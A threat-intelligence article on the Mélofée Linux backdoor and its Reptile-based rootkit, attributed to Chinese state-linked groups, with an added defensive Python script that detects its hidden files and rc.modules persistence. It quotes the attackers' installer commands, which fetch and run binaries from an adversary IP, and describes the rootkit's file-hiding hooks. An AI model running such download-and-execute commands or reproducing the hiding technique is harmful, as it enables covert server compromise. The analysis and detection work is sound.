Mélofée – New Linux Malware Linked to Chinese APT Groups
A new piece of malware targeted at Linux servers has been connected to an unidentified Chinese state-sponsored hacking organization.
ExaTrack, a French cybersecurity company, found three samples of the previously undocumented malware, dating from early 2022, and named it Mélofée.
Mélofée implant analysis
We found three samples of this malware family, which we dubbed Mélofée. Two of these samples included a version number (20220111 and 20220308), and we assess that the last sample was likely dated from late April or May 2022.
All these samples shared a common code base, but showed constant development in the following areas:
- evolution of the communication protocol and the packet format
- a change in the encryption of the configuration, first using RC4 and then a simple XOR
- the development of a SelfForwardServer functionality
- lastly, the inclusion of a kernel mode rootkit in the last sample.
Rootkit
The first sample we found dropped a rootkit based on a modified version of the open source project Reptile.
According to the vermagic metadata, it is compiled for kernel version 5.10.112-108.499.amzn2.x86_64 (an Amazon Linux 2 kernel). The rootkit has a limited set of features, mainly installing a hook designed for hiding itself. The rootkit hooks the functions fillonedir, filldir and filldir64 so that files whose names contain intel_audio or rc.modules are not displayed when listing a directory.
It also hooks the inet_ioctl function in order to communicate with its userland part through the ioctl system call. The kernel rootkit expects the userland component to pass the value 0xe0e0e0e in the ioctl call, and supports two commands (hide and show).
The rootkit is loaded both by the installer and by the server component with a call to the insmod utility.
Installer
The implant and the rootkit were installed using shell commands that download both the installer and a custom binary package from an adversary-controlled server. This behaviour is similar to the installation process of the Winnti Linux rootkits.

```sh
wget http://173.209.62[.]186:8765/installer -O /var/tmp/installer
wget http://173.209.62[.]186:8765/a.dat -O /var/tmp/usbd;
chmod +x /var/tmp/installer;
/var/tmp/installer -i /var/tmp/usbd
```
The installer is also developed in C++ and takes the binary package as an argument. It then extracts and installs both the rootkit and the server component. The rootkit and implant paths are hardcoded to /etc/intel_audio/intel_audio.ko and /etc/intel_audio/audio respectively.
The installer inserts the kernel rootkit with a call to system("insmod /etc/intel_audio/intel_audio.ko"), and also installs persistence in the /etc/rc.modules file.
Writing to this script ensures that both the kernel rootkit and the implant are executed at boot time.
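The artifacts described in the rootkit and installer sections above can be checked on a host without trusting directory listings. The following Python script is an added example, not ExaTrack's code and not part of the original report; it assumes only the indicators stated above: names containing intel_audio or rc.modules are filtered by the hooked filldir functions, the rootkit and implant sit at the two hardcoded paths under /etc/intel_audio/, and persistence is an insmod line in /etc/rc.modules. Because the hooks are in the filldir family, which only filters readdir() output, a direct stat() on the exact path still succeeds; the script uses that cross-view gap to distinguish a hidden file from an absent one. The on-disk fixture it builds is constructed for the demonstration, and the hiding_listdir helper simulates the hook so the logic can be exercised on a clean machine.

```python
"""Host triage for Mélofée / Reptile-style file hiding and rc.modules persistence.

Added example, not ExaTrack's code. Indicators are taken from the report text:
names containing "intel_audio" or "rc.modules" are dropped by the hooked
filldir functions, the rootkit and implant live under /etc/intel_audio/, and
persistence is an insmod line written to /etc/rc.modules.
"""
import os
import re
import tempfile

HIDDEN_SUBSTRINGS = ("intel_audio", "rc.modules")
ARTIFACT_PATHS = (
    "/etc/intel_audio",
    "/etc/intel_audio/intel_audio.ko",
    "/etc/intel_audio/audio",
    "/etc/rc.modules",
)
MODULE_NAME = "intel_audio"
INSMOD_RE = re.compile(r"\binsmod\s+(\S+)")


def check_paths(paths, listdir=os.listdir):
    """Cross-view check: stat() each path directly, then look for its name in the
    parent directory listing. A filldir-family hook filters readdir() output but
    does not intercept lookup of an exact path, so a rootkit-hidden file reports
    "hidden" (stat ok, missing from listing) instead of "absent".
    `listdir` is injectable so the hook can be simulated on a clean host."""
    verdicts = {}
    for path in paths:
        try:
            os.stat(path)
        except FileNotFoundError:
            verdicts[path] = "absent"
            continue
        parent, name = os.path.split(path)
        verdicts[path] = "visible" if name in listdir(parent or "/") else "hidden"
    return verdicts


def insmod_targets(script_text):
    """Module paths that an rc.modules-style script loads with insmod (comments skipped)."""
    targets = []
    for line in script_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = INSMOD_RE.search(line)
        if match:
            targets.append(match.group(1))
    return targets


def suspicious_targets(targets):
    """insmod targets outside the distro module tree, or matching a hidden-name substring."""
    return [t for t in targets
            if not t.startswith("/lib/modules/")
            or any(s in t for s in HIDDEN_SUBSTRINGS)]


def module_loaded(proc_modules_text, name=MODULE_NAME):
    """True if `name` is the first column of a /proc/modules line. Absence is not
    proof of a clean host: a self-hiding module can unlink itself from that list."""
    return any(line.split(" ", 1)[0] == name
               for line in proc_modules_text.splitlines() if line.strip())


def build_fixture():
    """Constructed on-disk layout mirroring the report's hardcoded paths (a fixture,
    not a real infection). Returns the temporary root that stands in for /."""
    root = tempfile.mkdtemp(prefix="melofee_triage_")
    os.makedirs(os.path.join(root, "etc", "intel_audio"))
    files = {
        "etc/intel_audio/intel_audio.ko": b"\x7fELF placeholder, not a real module",
        "etc/intel_audio/audio": b"\x7fELF placeholder, not a real implant",
        "etc/rc.modules": b"#!/bin/sh\ninsmod /etc/intel_audio/intel_audio.ko\n"
                          b"/etc/intel_audio/audio &\n",
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


def hiding_listdir(directory):
    """Simulates the rootkit's filldir hook: drops names containing a hidden substring."""
    return [n for n in os.listdir(directory)
            if not any(s in n for s in HIDDEN_SUBSTRINGS)]


def triage(root="", listdir=os.listdir):
    """Run every check; `root` is prefixed to the hardcoded paths so a fixture can replace /."""
    verdicts = check_paths([root + p for p in ARTIFACT_PATHS], listdir)
    rc_path = root + "/etc/rc.modules"
    targets = []
    if verdicts[rc_path] != "absent":
        with open(rc_path, encoding="utf-8", errors="replace") as fh:
            targets = insmod_targets(fh.read())
    return {
        "hidden": sorted(p[len(root):] for p, v in verdicts.items() if v == "hidden"),
        "present": sorted(p[len(root):] for p, v in verdicts.items() if v != "absent"),
        "suspicious_insmod": suspicious_targets(targets),
    }


if __name__ == "__main__":
    fixture = build_fixture()
    print("clean readdir :", triage(fixture))
    print("hooked readdir:", triage(fixture, listdir=hiding_listdir))
```

Run against a live host with triage() and the default os.listdir; anything reported as "hidden" means the path resolved but its name was filtered from the listing. Note that the implant binary itself is named audio, which the substring filter does not match, so listing /etc/intel_audio by name still shows it even though the directory is hidden from a listing of /etc. The /proc/modules check is a supporting signal only, since the module hides itself.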
One of the artifacts is designed to load a kernel-mode rootkit that is based on the Reptile open source project.
“According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64,” the company said in a report. “The rootkit has a limited set of features, mainly installing a hook designed for hiding itself.”
The installer and a custom binary package are downloaded from an adversary-controlled server by shell commands, and the installer is then used to deploy both the implant and the rootkit.
The installer takes the binary package as an argument and extracts both the rootkit and a server implant module from it.
Mélofée's capabilities are similar to those of other backdoors of its kind: it communicates with a remote server and receives instructions that let it operate on files, create sockets, run a shell, and execute arbitrary commands.
The malware’s ties to China come from infrastructure overlaps with groups such as APT41 (aka Winnti) and Earth Berberoka (aka GamblingPuppet).
Earth Berberoka is the name given to a state-sponsored actor chiefly targeting gambling websites in China since at least 2020 using multi-platform malware like HelloBot and Pupy RAT.
According to Trend Micro, some samples of the Python-based Pupy RAT have been concealed using the Reptile rootkit.
AlienReverse
Also discovered by ExaTrack is another implant codenamed AlienReverse, which shares code similarities with Mélofée and makes use of publicly-available tools like EarthWorm and socks_proxy.
The firm claimed that the “Mélofée implant family is yet another weapon in the toolbox of Chinese state-sponsored attackers, which show constant innovation and development.”
“Despite being comparatively straightforward, Mélofée’s capabilities could allow adversaries to carry out their attacks covertly. The fact that these implants were not frequently observed indicates that the attackers are probably only using them on high-value targets.”